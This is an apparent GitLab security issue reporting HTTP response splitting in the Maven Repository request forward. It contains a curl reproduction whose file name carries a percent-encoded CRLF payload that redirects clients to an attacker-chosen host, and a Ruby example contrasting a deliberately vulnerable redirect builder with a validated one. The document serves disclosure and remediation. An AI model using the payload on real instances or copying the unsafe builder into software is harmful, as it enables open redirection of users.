Maven request forward is vulnerable to response splitting
🔥 Problem
Similar to Open Redirection Through HTTP Response Splitting (#389328 - closed), the Maven Repository request forward is vulnerable to response splitting: a percent-encoded CRLF (`%0d%0a`) in the requested file name is decoded and copied verbatim into the redirect target, so the attacker-controlled text after it ends up in the `Location` header.
🔧 How to reproduce
Create a public project, then request a Maven file from it with curl, using a file name that starts with a percent-encoded CRLF (`%0d%0a`) followed by an attacker-chosen URL (the second slash is encoded as `%2f` so it survives path handling):
```
curl -vvv "http://gdk.test:8000/api/v4/projects/7/packages/maven/com/mycompany/mydepartment/my-project/1.0-SNAPSHOT/%0d%0ahttp:/%2fexample.com?test"
* Trying 172.16.123.1:8000...
* Connected to gdk.test (172.16.123.1) port 8000 (#0)
> GET /api/v4/projects/7/packages/maven/com/mycompany/mydepartment/my-project/1.0-SNAPSHOT/%0d%0ahttp:/%2fexample.com?test HTTP/1.1
> Host: gdk.test:8000
> User-Agent: curl/7.87.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Cache-Control: no-cache
< Content-Security-Policy: default-src 'none'
< Content-Type: text/plain
< Location: http://example.com
< Vary: Origin
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-Request-Id: 01GYCNPD7NHJMC1XTG5N3QPPEF
< X-Runtime: 0.107840
< Date: Wed, 19 Apr 2023 11:51:44 GMT
< Content-Length: 153
<
This resource has been moved temporarily to https://repo.maven.apache.org/maven2/com/mycompany/mydepartment/my-project/1.0-SNAPSHOT/
* Connection #0 to host gdk.test left intact
http://example.com.
```
The `Location` header is `http://example.com`, not the Maven Central URL named in the response body: the decoded CRLF in the file name has split the redirect target, so the client is sent to an attacker-chosen host instead of being forwarded to Maven Central.
🔮 Other considerations
The request forward for the Maven Repository is behind a feature flag that is currently disabled on gitlab.com, so gitlab.com is not exposed until the flag is enabled; any instance running with the flag on is.
Here is the rollout issue: https://gitlab.com/gitlab-org/gitlab/-/issues/359553
🚒 Solution
- Apply the same fix as in Open Redirection Through HTTP Response Splitting (#389328 - closed): validate the path and file name parameters (with either the existing regex or the file path validation) before they are used to build the redirect URL.
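To make the fix concrete, here is an added example in Ruby (the language of GitLab's API layer). It is not GitLab's code and does not use `Gitlab::Regex.maven_path_regex`; the allow-list regexes, the `forward_url_*` helpers and the request values are constructed for this example. It percent-decodes the `path` and `file_name` segments the way Rack does before they reach an endpoint, shows how the decoded CRLF turns a naively built `Location` header into two lines, and shows a validated builder that rejects the segment. It also shows why the validation must anchor with `\A`/`\z` rather than `^`/`$`, which are line anchors in Ruby.

```ruby
# Added example (not GitLab's code): response splitting through a redirect
# built from an untrusted Maven path, and a validated builder that rejects it.

MAVEN_CENTRAL = 'https://repo.maven.apache.org/maven2/'

# Constructed allow-lists for this example (not Gitlab::Regex.maven_path_regex):
# path = slash-separated segments of [A-Za-z0-9_.-], file name = one segment.
# \A and \z anchor the whole string. ^ and $ are line anchors in Ruby, so the
# WEAK variant accepts a segment that hides a second line after "\n".
PATH_REGEX = %r{\A[A-Za-z0-9_.-]+(?:/[A-Za-z0-9_.-]+)*\z}
FILE_NAME_REGEX = /\A[A-Za-z0-9_.-]+\z/
WEAK_FILE_NAME_REGEX = /^[A-Za-z0-9_.-]+$/

class InvalidPath < StandardError; end

# Percent-decode a raw path segment as Rack does before it reaches the
# endpoint, so "%0d%0a" becomes a literal CRLF and "%2f" becomes "/".
def decode_segment(raw)
  raw.gsub(/%([0-9A-Fa-f]{2})/) { Regexp.last_match(1).hex.chr }
end

# Vulnerable builder: splices the decoded segments straight into the redirect
# target, the same shape that produced the split Location header above.
def forward_url_unsafe(path, file_name)
  "#{MAVEN_CENTRAL}#{path}/#{file_name}"
end

# Hardened builder: allow-list both segments before the URL is assembled, and
# refuse CR/LF in the result even if the allow-list is later loosened.
def forward_url_safe(path, file_name)
  raise InvalidPath, "path rejected: #{path.inspect}" unless path.match?(PATH_REGEX)
  raise InvalidPath, "file name rejected: #{file_name.inspect}" unless file_name.match?(FILE_NAME_REGEX)

  url = "#{MAVEN_CENTRAL}#{path}/#{file_name}"
  raise InvalidPath, 'CR/LF in redirect target' if url.match?(/[\r\n]/)

  url
end

# What a naive "Location: <url>" header becomes on the wire: each element is
# one line the client parses, so a CRLF inside the URL yields a second line.
def location_header_lines(url)
  "Location: #{url}\r\n".split("\r\n")
end

# True when the line-anchored regex accepts the segment; a segment with an
# embedded "\n" passes because $ matches before the newline.
def passes_weak_check?(file_name)
  file_name.match?(WEAK_FILE_NAME_REGEX)
end

# Constructed request values mirroring the reproduction above.
RAW_PATH = 'com/mycompany/mydepartment/my-project/1.0-SNAPSHOT'
RAW_FILE = '%0d%0ahttp:/%2fexample.com'

if __FILE__ == $PROGRAM_NAME
  path = decode_segment(RAW_PATH)
  file = decode_segment(RAW_FILE)
  puts location_header_lines(forward_url_unsafe(path, file))
  begin
    forward_url_safe(path, file)
  rescue InvalidPath => e
    puts "hardened builder: #{e.message}"
  end
end
```

Running the file prints the two lines the unsafe builder produces (`Location: https://repo.maven.apache.org/maven2/.../1.0-SNAPSHOT/` and `http://example.com`) followed by the rejection from the hardened builder. The final CR/LF check is deliberately redundant with the allow-list: it is the cheap last line of defence if someone later widens the regex, or swaps a `\z` anchor for a `$`, which the `WEAK_FILE_NAME_REGEX` case shows is enough to let a newline-bearing segment through.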